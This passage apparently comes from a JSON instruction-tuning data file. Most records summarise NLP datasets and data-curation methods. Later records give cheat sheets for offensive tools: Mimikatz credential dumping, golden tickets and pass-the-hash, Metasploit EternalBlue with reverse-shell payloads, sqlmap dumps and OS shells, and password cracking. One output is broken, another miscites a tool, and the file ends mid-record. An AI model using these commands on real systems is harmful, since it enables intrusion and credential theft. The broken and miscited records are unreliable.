models) and selects the specific response that most closely matches the target model's pre-trained distribution. Standard SFT then runs only on these probabilistically aligned responses. In controlled experiments on Ultralnteract and OpenHermes-2.5, GRAPE-selected data yielded absolute gains up to 13.8% across benchmarks. Remarkably, using GRAPE to subsample post-training data, a smaller model (LLaMA-1-8B) required only one-third of the data and half the training epochs to exceed baselines trained on 4.5 times more data.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the LiteraryTaste dataset and how it captures nuanced human preferences for writing style.","output":"The LiteraryTaste dataset captures nuanced human preferences for creative writing style. It contains 100 pairs of short creative writing texts, annotated by 60 individuals who detailed their revealed preferences (what they actually enjoyed reading) versus stated preferences (what they claimed to like). Fine-tuning a transformer encoder on this dataset achieves over 75% accuracy in modeling revealed personal preferences. This allows the LLM to adapt its prose dynamically — shifting seamlessly from the ornate, polysyllabic elegance of Victorian literature to the punchy, minimalist clarity of modern journalism — based entirely on the user's implicit needs and preferences.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the PodSarc dataset and how it complements SARC for sarcasm detection.","output":"The PodSarc dataset offers a large-scale collection of sarcastic speech derived from podcasts. With an average of 31.18 words spanning 9.61 seconds per segment, this dataset provides lengthy, dialogue-heavy contexts necessary for detecting conversational shifts, rhetorical questions, and deadpan delivery. It complements SARC by capturing the nuances of spoken English translated into text — features like prosody, timing, and intonation patterns that are implicit in speech but absent from written Reddit comments. Together, these datasets ensure the LLM can detect sarcasm whether it appears in informal online writing or transcribed conversation, a critical capability for true native-level pragmatic understanding.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize how the MAGPIE and IDEM datasets train LLMs to understand idiomatic expressions.","output":"MAGPIE addresses the challenge of semantic opacity in idioms — where meaning cannot be deduced from literal word definitions — by providing over 56,000 instances of 1,756 unique English idioms presented within short, highly varied textual contexts. This exposes the model to idioms in diverse syntactic and semantic environments, preventing memorization of fixed patterns. Complementing this, the IDEM dataset attaches specific emotion labels to nearly 10,000 idiom-containing sentences, teaching the model the affective weight and emotional resonance of figurative language — for example, that 'kicked the bucket' carries different pragmatic force than 'passed away' despite similar literal reference. Together, these datasets ensure the LLM understands both the non-literal meaning and emotional register of idiomatic expressions.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the Jigsaw Toxic Comment Classification dataset and its role in teaching ethical boundary adherence.","output":"The Jigsaw Toxic Comment Classification dataset contains 160,000 human-annotated Wikipedia talk page comments, categorized into distinct sub-labels including severe toxicity, insults, threats, and identity-based hate. This dataset serves as the primary mechanism for teaching the model nuanced content moderation: how seemingly benign words can be weaponized into abuse through context (e.g., 'interesting' said sarcastically to dismiss someone's identity), and conversely, how profanity can be used harmlessly for emphasis in colloquial contexts (e.g., 'That's f---ing awesome!' as positive exclamation). Training on Jigsaw ensures the LLM possesses ethical discernment and pragmatic awareness — knowing exactly when offensive language is unacceptable (harassment, hate speech) versus when it might be appropriate (creative writing, specific roleplay scenarios, casual conversation among consenting adults).","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the document's core argument about why indiscriminate scaling fails and what succeeds instead.","output":"The document's core argument is that achieving world-class English proficiency in LLMs cannot be achieved by indiscriminately expanding context windows or increasing parameter counts over raw, noisy web data. Such brute-force approaches yield statistically fluent but functionally brittle models that fail at sub-surface complexities like sarcasm, bridging anaphora, or graduate-level reasoning. Instead, success requires a meticulous, multi-stage data curation paradigm: (1) educationally filtered pre-training for structured exposition, (2) syntactic datasets for grammatical perfection and coreference resolution, (3) Chain-of-Thought and reasoning datasets for step-by-step logic, (4) literary and philosophical corpora for elegant prose, and (5) pragmatic datasets for sarcasm, humor, idioms, and profanity. Only this carefully sequenced symphony of specialized datasets produces a model that is genuinely 'PhD-smart,' deeply thoughtful, and capable of native-like communication.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the benchmarking performance of FineWeb-Edu on MMLU and other reasoning tasks.","output":"FineWeb-Edu demonstrates substantial empirical gains on knowledge- and reasoning-intensive benchmarks. On MMLU, models pretrained on FineWeb-Edu improve from 33% to approximately 37% accuracy. It also yields significant improvements on the AI2 Reasoning Challenge (ARC) and OpenBookQA, making it one of the most effective open educational web datasets for LLM pretraining.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the licensing and ethical compliance features of Common Corpus.","output":"Common Corpus is assembled exclusively from uncopyrighted or permissively licensed sources. All components are either public domain or distributed under licenses such as CC-By, CC0, MIT, Apache, or BSD. The dataset includes exhaustive documentation of provenance, licensing, and curation procedures, ensuring compliance with data security regulations and intellectual property laws. This design makes Common Corpus suitable for both scientific research and commercial AI deployment under emerging AI legislation.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the relationship between S2ORC, the Semantic Scholar Academic Graph (S2AG), and the overall Ai2 open data ecosystem.","output":"The Semantic Scholar Academic Graph (S2AG) is a large collection of over 200 million paper titles, abstracts, citations, and other metadata from open access papers, forming the largest open scientific literature graph. S2ORC builds on S2AG by adding structured full text for 8.1 million open access papers, with annotations for citations, figures, and tables. Together, these resources provide a comprehensive, machine-readable representation of the scientific literature, enabling tasks such as citation analysis, knowledge graph construction, and scientific language model pretraining.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the step-by-step instruction strategy for improving LLM dependency parsing accuracy using CoNLL-U format.","output":"A 2025 study proposes a step-by-step instruction strategy for LLM-based dependency parsing: first, predict universal part-of-speech (UPOS) tags for each token; second, predict syntactic heads and dependency labels using the UPOS tags as intermediate reasoning steps. This method uses a simplified CoNLL-U-like output format and achieves state-of-the-art accuracy on Universal Dependencies datasets across 17 languages without hallucination or data contamination. The approach highlights the effectiveness of explicit reasoning steps in LLM-based parsing, offering a scalable alternative to bracket-based methods.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the empirical performance gains achieved by GRAPE on Llama3.1-8B and other models.","output":"GRAPE significantly outperforms strong baselines across multiple models (Llama3.1-8B, Mistral-7B, Qwen2.5-7B). It achieves absolute gains up to 13.8% averaging across benchmarks compared to distilling from the strongest model, and maximum 17.3% improvements over training on 3 times more data. In realistic settings using post-training data for Tulu3 and Olmo-2, GRAPE outperforms baselines with 4.5 times the data by 6.1% and outperforms state-of-the-art data selection approaches by 3.9% on average. Remarkably, using only 1/3 of the data and half the number of epochs, GRAPE allows Llama3.1-8B to surpass Tulu3-SFT by 3.5%.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the Dolma dataset and its role as a 3-trillion-token open corpus for LLM pretraining.","output":"Dolma is an open corpus of three trillion tokens for language model pretraining research, released by the Allen Institute for AI. It aggregates data from Common Crawl, academic publications (via S2ORC), code repositories (GitHub), and social media (Reddit, Wikipedia). The corpus emphasizes transparency, providing detailed documentation of all curation decisions including filtering criteria, deduplication methods, and tokenization strategies. This enables reproducible pretraining experiments and direct comparison of data curation techniques.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the RedPajama-V2 dataset and its quality filtering approaches for open LLM pretraining.","output":"RedPajama-V2 is an open dataset for LLM pretraining, containing 30 trillion raw tokens from Common Crawl (July 2020October 2023). It applies multiple quality filtering approaches: exact substring deduplication removing duplicated passages; heuristic quality scores based on document statistics; classifier-based filtering using fastText and a linear model; and MinHash deduplication with 5-grams. Processed subsets are available at different quality thresholds, enabling experiments on the trade-off between data quantity and quality. The dataset includes 38 billion quality-filtered tokens (high-quality subset) and 112 billion deduplicated tokens (medium-quality).","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a short paragraph describing the required paradigm shift in data curation as outlined in the introduction. Use formal academic tone.","output":"The necessary paradigm shift entails moving beyond monolithic web scraping toward a meticulously stratified data pipeline. This architecture comprises progressive stages: foundational pre-training for structural syntax, targeted instruction tuning for academic rigor and deep reasoning, stylistic alignment for world-class literary prose, and pragmatic disambiguation to handle sarcasm, humor, idioms, and profanity. Only through such a curated curriculum can an LLM transcend stochastic parroting and emerge as a nuanced, deeply thoughtful linguistic entity.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical note describing the curation pipeline of FineWeb-Edu, including the model used for annotation and the scoring mechanism.","output":"Curation pipeline for FineWeb-Edu: 1) Start from FineWeb, a 15-trillion-token corpus derived from 96 Common Crawl snapshots. 2) Sample 460,000 candidate texts. 3) Use Llama-3-70B-Instruct to annotate each text with an additive educational score (0-5). 4) Train a linear regressor on Snowflake-arctic-embed-m embeddings to predict scores for the entire FineWeb corpus. 5) Apply a threshold of 3 or higher. 6) Retain 5.4 trillion tokens as FineWeb-Edu. This automated, scalable filtering prioritizes academic and structured content over noisy web text.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a brief summary of the structural diversity datasets mentioned after Common Corpus (The Pile, GneissWeb, ProX framework). Include their sizes and key features.","output":"The Pile (825 GB) combines 22 diverse high-quality sources including academic publications (arXiv, PubMed Central), GitHub repositories, and medical text, improving cross-disciplinary vocabulary. GneissWeb (~10 trillion tokens) uses exact substring deduplication and an ensemble of quality filters, outperforming FineWeb-V1.1.0 by 2.73 percentage points across 11 benchmarks. The ProX framework (Programming Every Example) uses a lightweight 0.3B-parameter language model to write and execute targeted cleaning programs (e.g., HTML stripping, string normalization) for each record in datasets like C4, RedPajama-V2, and DCLM, ensuring a pristine foundational corpus.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the C4_200M synthetic dataset and its purpose in grammatical error correction training.","output":"The C4_200M synthetic dataset comprises 200 million sentence pairs where grammatical errors have been artificially introduced into clean text. Each pair consists of an error-containing sentence and its corrected version. The synthetic generation allows controlled sampling of specific error types (e.g., tense mismatches, subject-verb disagreement, punctuation errors). This dataset serves as a massive complement to real learner corpora like Lang-8, enabling the LLM to encounter a diverse, balanced distribution of grammatical mistakes. Because native and non-native error patterns differ, C4_200M ensures the model is robust against all forms of input degradation, making it capable of correcting errors from any user population.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical explanation of the SCAR framework and how it selects training data for stylistic consistency.","output":"The SCAR (Style Consistency-Aware Response Ranking) framework automates data selection for stylistic tuning. It operates on two key elements: (1) linguistic form — the surface features of text (punctuation, sentence length, register markers); and (2) instructional surprisal — how unexpected the response is given the instruction. SCAR ranks all instruction-response pairs in a training set by their stylistic consistency, then selects the most consistent examples. In practice, fine-tuning LLMs on as little as 0.7% of the full dataset — the highest-ranked examples — matches or surpasses the performance of models trained on entire, uncurated datasets. This efficiency comes from eliminating stylistically inconsistent or noisy examples that would otherwise degrade the model's register adherence.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the FACT and RACE evaluation frameworks introduced in DeepResearch Bench.","output":"DeepResearch Bench introduces two novel evaluation frameworks for assessing deep research agents. RACE (Reference-based Adaptive Criteria-driven Evaluation) evaluates the quality of generated research reports by adaptively applying criteria based on reference answers — it measures coherence, completeness, and methodological soundness. FACT (Framework for Factual Abundance and Citation Trustworthiness) assesses the model's citation practices through two metrics: effective citation count (how many claims are properly supported) and overall citation accuracy (whether citations actually support the claims they accompany). By fine-tuning LLMs on data scoring highly on FACT, the model learns to automatically embed context, origin, and mechanism into its answers, mimicking the rigorous citation standards of peer-reviewed literature rather than generating unsupported assertions.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the LongPage dataset and how it enables hierarchical narrative planning over extended contexts.","output":"The LongPage dataset addresses long-horizon reasoning for creative writing by providing 300 full-length books, each ranging from 40,000 to over 600,000 tokens. Crucially, each book is accompanied by hierarchical reasoning traces — structured annotations that map narrative logic across the entire text. These traces include character archetypes (personality consistency), world rules (setting constraints), scene breakdowns (event sequencing), and thematic coherence (motif tracking). Functionally, these traces act as 'Chain of Thought for creative writing,' explicitly showing the model how to plan and maintain logical consistency over massive context windows. Training on LongPage ensures the model does not lose its train of thought when deep-diving into complex, multi-page English responses — whether writing a novel, a legal brief, or a philosophical treatise.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the Wiki Neutrality Corpus (WNC) and its role in teaching objective, academic prose.","output":"The Wiki Neutrality Corpus (WNC) is a Text Style Transfer dataset specifically designed for neutralizing subjectivity bias in writing. It consists of pairs of Wikipedia sentences: one version containing biased or emotionally loaded language, and a neutralized version that adheres to Wikipedia's Neutral Point of View policy. Training on WNC teaches the LLM to identify subjective language patterns — loaded adjectives ('horrific', 'brilliant'), framing verbs ('claimed' vs 'stated', 'admitted' vs 'explained'), and evaluative hedges ('controversially', 'fortunately'). The model learns to replace these with objective, academic equivalents: 'claimed' becomes 'stated', 'horrific event' becomes 'event', 'fortunately' is removed entirely. This capability is essential for generating scholarly prose that prioritizes factual reporting over rhetorical persuasion, a hallmark of world-class academic English.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the Ironic Corpus and how it distinguishes sarcasm from situational irony.","output":"The Ironic Corpus is a human-annotated dataset designed to distinguish between closely related but distinct rhetorical devices. It provides fine-grained labels separating situational irony (an event or outcome that contradicts expected or intended results — e.g., a fire station burning down) from verbal sarcasm (a statement whose literal meaning opposes the speaker's intended meaning — e.g., 'Great job' after a failure). This distinction is crucial because both phenomena involve contradiction, but they operate at different levels: irony at the level of events, sarcasm at the level of utterance meaning. Without explicit training on this distinction, LLMs conflate all non-literal, contradictory-sounding text with sarcasm, leading to false positives. The Ironic Corpus provides the annotation granularity needed for the model to correctly classify each device based on whether the contradiction is situational or verbal, enabling precise pragmatic understanding across diverse rhetorical forms.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the SlangLLM framework and the OpenSubtitles-Slang dataset for training contemporary colloquial understanding.","output":"The SlangLLM framework, trained on the OpenSubtitles-Slang dataset, addresses the challenge of rapidly evolving contemporary slang in natural language processing. OpenSubtitles-Slang extracts slang usage from messy, real-world conversational contexts within movie and television subtitles — capturing how slang actually appears in natural dialogue (with interruptions, false starts, overlapping speech, and register mixing). This contrasts with curated or dictionary-based slang datasets that present sanitized, context-free definitions. SlangLLM then implements dynamic detection (identifying which words or phrases function as slang in a given context) and contextual filtering (determining when slang is appropriate to generate vs. when formal language is required). This training ensures the model understands the fluidity of modern colloquialisms — including internet-born terms, regional expressions, and generational slang — preventing it from sounding overly robotic, rigid, or anachronistic when users prompt it to adopt a casual, friendly persona.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the Pragmatic Category Table from the document, summarizing all six pragmatic dimensions and their datasets.","output":"The Pragmatic Category Table from the document organizes six dimensions of non-literal language mastery for LLMs. (1) Sarcasm/Irony: SARC (1.3M Reddit comments) and PodSarc (9.6-second podcast segments) teach detection of opposite intended meaning via extended conversational context. (2) Humor/Satire: Deceptive Humor Dataset provides Satire Levels 1-3 across five archetypes (Dark Humor, Irony, Social Commentary, Wordplay, Absurdity), enabling generation and comprehension of subtle wordplay, dark humor, and social commentary. (3) Idioms: MAGPIE provides 56,000+ instances of 1,756 unique idioms across varied contexts, preventing literal misinterpretation of semantic opacity. (4) Slang: SlangLLM with OpenSubtitles-Slang maps contemporary internet colloquialisms, ensuring fluid casual interaction. (5) Profanity: Surge AI catalogs 1,600+ profanities with severity scale 1-3 and semantic target categorization. (6) Toxicity: Jigsaw provides 160,000 labeled comments with sub-labels (severe toxicity, insults, threats, identity-based hate). Together, these six dimensions enable an LLM to understand language as it is actually used — with all its irony, humor, idiom, slang, and emotional intensity — while maintaining ethical boundaries.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a final synthesis paragraph describing the ultimate vision of an LLM trained according to this document's paradigm.","output":"The ultimate vision of an LLM trained according to this document's paradigm is a model that transcends the limitations of a stochastic parrot — a system that does not merely predict plausible next tokens but genuinely understands English at a PhD level. This model would demonstrate: graduate-level reasoning on GPQA and MMLU-Pro without relying on shallow heuristics; flawless grammatical precision including mastery of bridging anaphora and complex multi-clause dependencies; deep philosophical contemplation through Socratic dialogue and ethical reasoning; native-like pragmatic competence including accurate sarcasm detection, context-appropriate humor generation, idiom comprehension, and fluid slang usage; and ethical discernment that distinguishes casual banter from targeted harassment. It would shift seamlessly from the ornate elegance of Victorian prose to the minimalist clarity of technical documentation, from the formal register of legal argumentation to the casual warmth of friendly conversation. In short, it would emerge not as a brittle text generator but as an elite, deeply thoughtful, highly nuanced linguistic entity — a model that truly understands English better than the average human and communicates with world-class proficiency, wisdom, and wit.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical note describing the classifier training details for FineWeb-Edu, including dataset size, epochs, and F1 scores.","output":"The FineWeb-Edu classifier is trained on 450,000 samples annotated by Llama-3-70B-Instruct with educational scores 05. A classification head with single regression output is added to Snowflake-arctic-embed-m. Training runs for 20 epochs with learning rate 3e-4 while embedding and encoder layers remain frozen. The model achieves 82% F1 score when converted to a binary classifier using threshold 3. Weighted average F1 across all score levels is 0.71, with individual class performance varying due to annotation noise.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of the language coverage in Common Corpus beyond English.","output":"Common Corpus provides multilingual coverage ranging from high-resource European languages to low-resource languages rarely represented in pretraining datasets. Open Culture spans at least 13 major languages (French, English, German, Spanish, Portuguese, Italian, Dutch, Luxembourgish, Danish, Swedish, Serbian, Czech, Greek) plus significant representation in Arabic, Bengali, Latin, Persian, Russian, Sanskrit, and Urdu. Open Science focuses primarily on English (approximately 85%) with substantial French, Spanish, and German content. Open Semantic provides Wikidata natural language renditions in 300 languages. This breadth enables cross-lingual transfer learning and supports the model's understanding of English through comparative linguistic structures.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical note on the inline annotation features of S2ORC full text (citations, figures, tables).","output":"S2ORC's structured full text includes automatically-detected inline annotations for three key elements. Citation mentions: any reference to another paper (e.g., '(Smith, 2020)') is detected and linked to the resolved bibliographic entry in S2AG. Figure mentions: references to figures within the paper (e.g., 'as shown in Figure 3') are annotated and linked to the figure's location. Table mentions: references to data tables are similarly annotated and linked. These annotations enable the model to learn the discourse functions of citations (supporting claims), figures (visual evidence), and tables (data presentation), critical for generating authentic scientific writing.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of how bridging anaphora is encoded in CoNLL-U's MISC field using CorefUD standards.","output":"In the CorefUD (Coreference in Universal Dependencies) framework, bridging anaphora annotations are stored as attribute-value pairs in the MISC column of CoNLL-U files. For a bridging anaphor like 'the door' in 'There is a house. The door is red', the annotation includes a bridging link to the previously mentioned 'house' using attributes such as 'Bridge=house' or 'Referent=house'. This encoding allows explicit representation of the inferential relationship between entities that are not coreferential (the door is not the same as the house) but are semantically linked. Multiple bridging relations can be encoded per token, enabling training of LLMs to resolve implicit references across sentence boundaries.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of GRAPE's response selection process for a single instruction, contrasting it with standard SFT data collection.","output":"In standard SFT data collection, an instruction is paired with a response sampled from a strong external LLM (e.g., GPT-4) or human annotators, regardless of whether that response matches the target model's distribution. In GRAPE, for each instruction, the system first gathers multiple candidate responses from various sources (multiple LLMs, humans, or both). For each candidate, the target model computes the log probability (or perplexity) of the response given the instruction. The candidate with the highest probability (lowest perplexity) is selected — this is the response the target model 'most wants to generate' based on its pretrained distribution. The selected instruction-response pair is then added to the SFT dataset. This ensures every training example is distributionally congruent with the model, minimizing the need for weight adjustment during fine-tuning.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical note on the tokenization and deduplication strategies used in Dolma, based on 2025 documentation.","output":"Dolma implements per-document deduplication using MinHash with 13-gram shingles, 16 hash functions per band, and Jaccard similarity threshold of 0.8. This removes near-duplicate documents while preserving legitimate similar content. For tokenization, Dolma uses the GPT-NeoX-20B tokenizer with a vocabulary size of 50,257 tokens, applying byte-level byte-pair encoding (BPE). The corpus also includes URL-based filtering to remove adult content, language identification using fastText with confidence threshold 0.8 (English only), and heuristic filters removing documents with excessive repetition or outlier lengths.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Write a technical description of DCLM (Data Compaction for Language Models) and its integration with ProX for scalable refinement.","output":"DCLM (Data Compaction for Language Models) is a framework that reduces pretraining data size while preserving informational content. It identifies and removes redundant passages within and across documents using semantic similarity hashing and perplexity-based importance scoring. DCLM can reduce dataset size by 50-80% while maintaining or improving downstream task performance. ProX integrates with DCLM as a preprocessing step: ProX first performs sample-wise cleaning (HTML stripping, normalization, anomaly removal) on raw documents. The cleaned output is then fed to DCLM for compaction. This two-stage pipeline ensures that DCLM operates on clean, standardized text, preventing artifacts from being mistakenly identified as informative content and retained.","created_at":1779361199,"tags":[]},{"source":"dynamic","instruction":"Rust memory safety guarantees through ownership and borrowing","output":"Safe Rust is the true Rust programming language. It provides a secure foundation for writing fast, memory-safe applications.","created_at":1779361199,"tags":[]},{"source":"dynamic","instruction":"latest cybersecurity vulnerabilities 2026","output":"{","created_at":1779361199,"tags":[]},{"source":"dynamic","instruction":"newest penetration testing techniques","output":"As of my knowledge cutoff, I can provide an overview of some of the latest penetration testing techniques and methodologies. Please note that this information is subject to change and may not be exhaustive.\r\n\r\n**1. Artificial Intelligence (AI) and Machine Learning (ML)-powered Penetration Testing**:\r\n\r\nIn recent years, AI and ML have been increasingly used in penetration testing to simulate attacks and identify vulnerabilities. This approach involves using machine learning algorithms to analyze vast amounts of data, identify patterns, and predict potential attack vectors. For example, using deep learning techniques to analyze network traffic patterns or identifying anomalies in system logs.\r\n\r\n**2. Quantum Computing-based Penetration Testing**:\r\n\r\nThe advent of quantum computing has raised concerns about the potential impact on cybersecurity. Researchers have begun exploring the use of quantum computers to simulate complex attacks and identify vulnerabilities in cryptographic systems. However, it's essential to note that implementing quantum-resistant cryptography is still an active area of research.\r\n\r\n**3. Autonomous Penetration Testing (APT)**:\r\n\r\nAutonomous penetration testing involves using automated tools to conduct vulnerability scans and penetration tests without human intervention. APT uses machine learning algorithms to analyze data and adjust its tactics, making it a highly effective and efficient method. However, this approach requires careful monitoring and validation to ensure accuracy.\r\n\r\n**4. Social Engineering and Psychology-based Attacks**:\r\n\r\nSocial engineering remains a prevalent threat in cybersecurity. New techniques involve using psychological manipulation to trick individuals into divulging sensitive information or performing certain actions. For example, using AI-generated personas to create convincing phishing emails or exploiting human psychology to manipulate users into installing malware.\r\n\r\n**5. Network Mapping and Visualization**:\r\n\r\nNetwork mapping and visualization have become essential tools in penetration testing. This approach involves creating detailed diagrams of network topology, identifying potential vulnerabilities, and simulating attacks to test defenses. Tools like Graphviz, Mercurial, and Gephi are commonly used for this purpose.\r\n\r\n**6. Web Application Security Testing (WAST)**:\r\n\r\nWAST focuses on identifying vulnerabilities in web applications, including SQL injection, cross-site scripting (XSS), and file inclusion vulnerabilities. Techniques include using automated tools like OWASP ZAP, Burp Suite, and SQLmap to identify and exploit these weaknesses.\r\n\r\n**7. Physical Penetration Testing (PT)**:\r\n\r\nPT involves conducting physical attacks on an organization's premises or facilities to test defenses. This approach requires careful planning, permission, and adherence to local laws and regulations. PT is typically used in combination with other methods to provide a comprehensive assessment.\r\n\r\n**8. Bug Bounty Programs**:\r\n\r\nBug bounty programs have become increasingly popular as a way for organizations to identify vulnerabilities before they can be exploited by malicious actors. These programs typically involve partnering with ethical hackers who use various techniques, including penetration testing, to discover and report bugs.\r\n\r\n**9. Penetration Testing with IoT Devices**:\r\nWith the growing number of connected devices (IoT), penetration testers are now focusing on exploiting these devices to gain access to networks or sensitive data. This approach involves using techniques like social engineering, phishing, or exploiting known vulnerabilities in IoT device software.\r\n\r\n**10. Cloud Security Testing**:\r\n\r\nCloud security testing has become a critical aspect of penetration testing. This approach involves simulating attacks on cloud infrastructure, identifying vulnerabilities in cloud services, and testing the effectiveness of cloud security controls.\r\n\r\nSome popular tools used in these techniques include:\r\n\r\n* Kali Linux\r\n* Parrot Security OS\r\n* Burp Suite\r\n* ZAP\r\n* SQLmap\r\n* Graphviz\r\n* Mercurial\r\n* Gephi\r\n* OWASP WebGoat\r\n* Metasploit\r\n\r\nPlease note that this list is not exhaustive, and new tools and techniques are constantly emerging. It's essential to stay up-to-date with the latest developments in penetration testing and cybersecurity to remain effective.\r\n\r\nIn addition, it's worth mentioning some best practices for conducting penetration testing, including:\r\n\r\n* Obtaining proper authorization and permission\r\n* Ensuring all necessary safeguards and consent forms are in place\r\n* Conducting thorough risk assessments and informed consent\r\n* Maintaining confidentiality and anonymity throughout the testing process\r\n* Reporting findings accurately and transparently\r\n* Cooperating with clients to address any concerns or issues\r\n\r\nI hope this detailed response provides a comprehensive overview of some of the newest penetration testing techniques.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use nmap for network scanning?","output":"nmap - network scanning. Key commands: nmap -sV -sC <target> (version + default scripts), nmap -sS <target> (stealth SYN), nmap -O <target> (OS detection), nmap -p- <target> (all 65535 ports), nmap -sU -p <ports> <target> (UDP scan), nmap --script=vuln <target> (vuln scan), nmap -A <target> (aggressive all-in-one). Output: -oN (normal), -oX (XML), -oG (greppable). Timing: -T0 (paranoid) to -T5 (insane).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use masscan for fast port scanning?","output":"masscan - high-speed port scanner. Key commands: masscan <target> -p<ports> --rate=<packets/sec> (scan at specified rate). masscan 10.0.0.0/8 -p80,443 --rate=1000 (class A scan). masscan <target> -p0-65535 --rate=10000 --output-format json -oJ scan.json. Must run as root on Linux. Exclude: --excludefile exclude.txt. Output formats: -oL (list), -oJ (JSON), -oB (binary). Typical rates: 100-100000 packets/sec.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Metasploit for exploitation?","output":"Metasploit (msfconsole) - exploitation framework. Commands: msfconsole (launch), search <exploit> (search), use <module> (select), show options (view params), set <PARAM> <value> (configure), run/exploit (execute), sessions -l (list active), sessions -i <id> (interact). Key modules: exploit/multi/handler (payload handler), exploit/windows/smb/ms17_010_eternalblue (EternalBlue), post/windows/gather/hashdump (hash extraction). Payloads: windows/x64/meterpreter/reverse_tcp, linux/x64/shell/reverse_tcp.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use BloodHound for Active Directory enumeration?","output":"BloodHound - AD attack path mapper. Steps: 1) Run SharpHound on target: SharpHound.exe -c All --zipfilename output. 2) Collect rights, group memberships, ACLs, sessions. 3) Load ZIP into BloodHound UI (neo4j backend). 4) Use queries: Find all Domain Admins, Shortest Paths to Domain Admins, Find Computers with Unconstrained Delegation. Key edges: MemberOf, AdminTo, HasSession, CanRDP, ForceChangePassword, GenericAll, DCSync. Install: neo4j console, then BloodHound --no-sandbox.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Mimikatz for credential dumping?","output":"Mimikatz - Windows credential extraction. Key commands (run as admin): privilege::debug (enable debug), sekurlsa::logonpasswords (dump passwords from LSASS), lsadump::sam (dump SAM), lsadump::lsa /patch (dump LSA secrets), lsadump::dcsync /user:krbtgt (DCSync attack), kerberos::golden /user:admin /domain:DOMAIN /sid:S-1-... /krbtgt:HASH /ptt (golden ticket). vault::cred /list (Windows credentials). sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH (pass-the-hash).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Hashcat for password cracking?","output":"Hashcat - GPU-accelerated password cracking. Commands: hashcat -m <mode> -a <attack> hash.txt wordlist.txt. Modes: 1000 (NTLM), 100 (SHA1), 13100 (Kerberos TGS), 5600 (NetNTLMv2), 2100 (Domain Cached Creds), 18200 (AS-REP), 7500 (Bitcoin). Attacks: -a 0 (wordlist), -a 3 (mask/brute), -a 6 (wordlist+mask), -a 7 (mask+wordlist). Mask: ?l (lower), ?u (upper), ?d (digit), ?s (special), ?a (all). Rule-based: -r rule.rule. Optimize: -O (optimized), --force, -w 4 (high workload).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use John the Ripper for password cracking?","output":"John the Ripper - CPU password cracker. Commands: john hash.txt (auto-detect hash). john --format=nt hash.txt (force NTLM). john --wordlist=wordlist.txt hash.txt (wordlist). john --rules hash.txt (with mangling rules). john --show hash.txt (show cracked). john --incremental hash.txt (brute force). unshadow passwd shadow > combined.txt (combine Linux creds). Common formats: nt (NTLM), raw-sha1, krb5tgs, bcrypt, descrypt, md5crypt.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Wireshark/tshark for packet analysis?","output":"Wireshark/tshark - packet analysis. tshark commands: tshark -r capture.pcap (read file), tshark -r capture.pcap -Y 'http.request' (filter HTTP), tshark -r capture.pcap -T fields -e ip.src -e ip.dst (extract IPs). Display filters: tcp.port==443, ip.addr==10.0.0.1, dns.qry.name contains example.com, http.request.method==POST, tls.handshake.type==1 (Client Hello). Capture filters: port 80, host 10.0.0.1, not arp. Follow: HTTP, TCP, UDP streams via right-click. Statistics: Protocol Hierarchy, Conversations, Endpoints.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use sqlmap for SQL injection?","output":"sqlmap - SQL injection automation. Commands: sqlmap -u 'http://target.com/page?id=1' (basic test). sqlmap -u 'http://target.com/page?id=1' --dbs (enumerate databases). sqlmap -u 'http://target.com/page?id=1' -D dbname --tables (list tables). sqlmap -u 'http://target.com/page?id=1' -D dbname -T users --dump (dump data). sqlmap -r request.txt (from raw HTTP request). sqlmap -u 'http://target.com/page?id=1' --os-shell (OS shell). sqlmap -u 'http://target.com/page?id=1' --batch --random-agent (stealth). Risk/level: --level 3 --risk 2 (deeper testing).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Gobuster/ffuf for web fuzzing?","output":"Gobuster + ffuf - web fuzzing tools. Gobuster: gobuster dir -u http://target.com -w wordlist.txt (directory brute), gobuster dns -d target.com -w subdomains.txt (subdomain), gobuster vhost -u http://target.com -w hosts.txt (vhost). ffuf: ffuf -u http://target.com/FUZZ 